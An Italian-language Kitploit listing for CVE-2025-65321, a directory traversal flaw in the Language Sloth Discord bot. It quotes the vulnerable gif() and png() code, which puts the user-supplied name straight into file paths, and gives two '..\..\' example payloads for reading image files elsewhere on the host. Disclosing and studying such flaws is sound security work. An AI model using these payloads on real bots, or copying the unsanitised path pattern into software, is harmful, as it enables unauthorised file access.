Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-65321 — Language Sloth Sloth Bot 1.0 è vulnerabile a Directory Traversal nelle funzioni gif() e png(). Le funzioni costruiscono percorsi dei file utilizzando input utente non sanitizzato per il parametro 'name', consentendo agli aggressori di fare riferimento a file al di fuori delle directory di risorse previste. | Kitploit
Strumenti/GitHubGitHub/smarttfoxx/cve-2025-65321
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiRaccolta Informazioni
GitHubsmarttfoxx/cve-2025-65321

CVE-2025-65321

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

28 mesi faNon ancora revisionato

Language Sloth Sloth Bot 1.0 è vulnerabile a Directory Traversal nelle funzioni gif() e png(). Le funzioni costruiscono percorsi dei file utilizzando input utente non sanitizzato per il parametro 'name', consentendo agli aggressori di fare riferimento a file al di fuori delle directory di risorse previste.

Condividi

CVE-2025-65321

Il bot Discord Language Sloth è vulnerabile a Directory Traversal nelle funzioni gif() e png(). Le funzioni costruiscono percorsi di file utilizzando input utente non sanificati per il parametro 'name', consentendo agli attaccanti di fare riferimento a file al di fuori delle directory di risorse previste.

Le funzioni "gif" e "png" nel file files.py sono vulnerabili al directory traversal poiché usano "open" per recuperare localmente file dal server che ospita il bot. I payload seguenti consentono a qualsiasi utente di Discord di recuperare file ".gif" e ".png" ospitati ovunque sul server che ospita il bot.

root@kitploit:~
async def gif(self, ctx, name: str = None):
        '''
        (ADM) Sends a gif from the bot's gif folder.
        :param name: The name of the gif file.
        '''
        await ctx.message.delete()
        try:
            with open(f'./gif/{name}.gif', 'rb') as pic:
                await ctx.send(file=discord.File(pic))
        except FileNotFoundError:
            return await ctx.send("**File not found!**")
root@kitploit:~
async def png(self, ctx, name: str = None):
        '''
        (ADM) Sends a png from the bot's png folder.
        :param name: The name of the png file.
        '''
        await ctx.message.delete()
        try:
            await ctx.send(file=discord.File(f'./png/{name}.png'))
        except FileNotFoundError:
            return await ctx.send("**File not found!**")

Il parametro name viene interpolato direttamente nel percorso del file senza validazione o sanitizzazione:

root@kitploit:~
f'./gif/{name}.gif'
f'./png/{name}.png'

Payload di esempio:

root@kitploit:~
z!gif ..\..\..\..\Windows\filename
root@kitploit:~
z!png ..\..\..\..\Windows\filename
immagine

L'immagine sopra mostra l'estrazione di un'immagine situata in C:\Windows\cat.gif

Scarica lo strumento